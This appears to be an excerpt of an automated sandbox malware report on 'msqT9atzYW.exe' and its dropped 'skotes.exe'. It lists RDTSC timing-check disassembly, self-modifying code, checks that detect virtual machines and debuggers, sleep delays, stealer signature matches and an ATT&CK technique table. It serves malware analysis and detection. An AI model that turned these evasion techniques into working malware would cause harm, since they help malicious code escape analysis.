                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D08EF second address: 53D09B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43C8AE007Bh 0x00000008 call 00007F43C8AE0088h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 test esi, esi 0x00000013 jmp 00007F43C8AE0081h 0x00000018 je 00007F443AAB5AD8h 0x0000001e jmp 00007F43C8AE007Eh 0x00000023 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002a pushad 0x0000002b mov bx, cx 0x0000002e mov dh, ch 0x00000030 popad 0x00000031 mov ecx, esi 0x00000033 jmp 00007F43C8AE0085h 0x00000038 je 00007F443AAB5AB4h 0x0000003e pushad 0x0000003f movzx ecx, dx 0x00000042 pushfd 0x00000043 jmp 00007F43C8AE0089h 0x00000048 or ah, FFFFFFF6h 0x0000004b jmp 00007F43C8AE0081h 0x00000050 popfd 0x00000051 popad 0x00000052 test byte ptr [77436968h], 00000002h 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F43C8AE007Dh 0x00000060 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D09B5 second address: 53D0A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43C9098CF7h 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F443B06E6C7h 0x00000014 pushad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F43C9098CF5h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F43C9098CF9h 0x0000002c or ecx, 3FBB7C76h 0x00000032 jmp 00007F43C9098CF1h 0x00000037 popfd 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0A2F second address: 53D0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F43C8AE0083h 0x0000000e jmp 00007F43C8AE0088h 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F43C8AE0080h 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F43C8AE0080h 0x00000020 push eax 0x00000021 jmp 00007F43C8AE007Bh 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F43C8AE0084h 0x0000002e xor cx, D0B8h 0x00000033 jmp 00007F43C8AE007Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F43C8AE0088h 0x0000003f and cl, 00000018h 0x00000042 jmp 00007F43C8AE007Bh 0x00000047 popfd 0x00000048 popad 0x00000049 push dword ptr [ebp+14h] 0x0000004c jmp 00007F43C8AE0086h 0x00000051 push dword ptr [ebp+10h] 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 mov eax, 57F51653h 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0B59 second address: 53D0B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, al 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0B60 second address: 53D0B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0087h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0B7B second address: 53D0B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43C9098CF0h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0B96 second address: 53D0BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0BA8 second address: 53D0BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0BAC second address: 53D0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007F43C8AE0087h 0x0000000e mov esp, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov esi, edx 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0BD7 second address: 53D0BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0BDD second address: 53D0BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E0D88 second address: 53E0D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E0D8C second address: 53E0D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E0A8D second address: 53E0A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5450E73 second address: 5450E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5450E79 second address: 5450E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5450E7D second address: 5450EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F43C8AE0086h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5450EAB second address: 5450EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 1599C5F9h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5450EB5 second address: 5450ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5450514 second address: 5450530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 545033A second address: 545038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 48786F68h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov ebx, 19C13044h 0x0000001a pushfd 0x0000001b jmp 00007F43C8AE007Dh 0x00000020 sub eax, 7724E186h 0x00000026 jmp 00007F43C8AE0081h 0x0000002b popfd 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F43C8AE007Dh 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 545038C second address: 54503A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54503A8 second address: 54503AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54503AC second address: 54503B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0167 second address: 53F01C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F43C8AE007Ah 0x00000011 or esi, 610588F8h 0x00000017 jmp 00007F43C8AE007Bh 0x0000001c popfd 0x0000001d call 00007F43C8AE0088h 0x00000022 movzx ecx, di 0x00000025 pop edi 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 jmp 00007F43C8AE0083h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F01C5 second address: 53F01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F01C9 second address: 53F0229 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F43C8AE0084h 0x00000008 adc ecx, 16CF34E8h 0x0000000e jmp 00007F43C8AE007Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F43C8AE0084h 0x0000001f add si, 4748h 0x00000024 jmp 00007F43C8AE007Bh 0x00000029 popfd 0x0000002a mov ax, 4EBFh 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 mov dl, B8h 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5450686 second address: 545068C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 545068C second address: 54506AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bl, ah 0x0000000e mov edx, 26EF6E4Eh 0x00000013 popad 0x00000014 push dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54506AE second address: 54506B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54506B2 second address: 54506C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54506C0 second address: 54506D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54506D2 second address: 54506F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov esi, 22EEA83Fh 0x00000011 popad 0x00000012 push 912E01ADh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F43C8AE007Eh 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54506F9 second address: 545070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 545070B second address: 545070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSpecial instruction interceptor: First address: C4EBCC instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSpecial instruction interceptor: First address: C4EC6B instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSpecial instruction interceptor: First address: E098B4 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSpecial instruction interceptor: First address: E37BA9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSpecial instruction interceptor: First address: E1084E instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSpecial instruction interceptor: First address: E9AC13 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: FCEBCC instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: FCEC6B instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 11898B4 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 11B7BA9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 119084E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 121AC13 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeCode function: 0_2_05450654 rdtsc 0_2_05450654
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1081Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 511Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1316Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1201Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2836Thread sleep count: 37 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2836Thread sleep time: -74037s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6512Thread sleep count: 1081 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6512Thread sleep time: -2163081s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788Thread sleep count: 511 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788Thread sleep time: -15330000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2848Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4856Thread sleep count: 1316 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4856Thread sleep time: -2633316s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5396Thread sleep count: 1201 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5396Thread sleep time: -2403201s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                    Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
                    Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: msqT9atzYW.exe, 00000000.00000002.2266464940.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2299739662.0000000001167000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2311366015.0000000001167000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeCode function: 0_2_05450654 rdtsc 0_2_05450654
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F9652B mov eax, dword ptr fs:[00000030h]7_2_00F9652B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F9A302 mov eax, dword ptr fs:[00000030h]7_2_00F9A302
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: EProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F7D3E2 cpuid 7_2_00F7D3E2
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F7CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,7_2_00F7CBEA
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F665E0 LookupAccountNameA,7_2_00F665E0

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 7.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.msqT9atzYW.exe.be0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000003.2271001764.0000000005790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2311270072.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2764127770.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2266387478.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2299648103.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2226138822.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2258806341.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory741
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Account Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    System Owner/User Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                    System Information Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
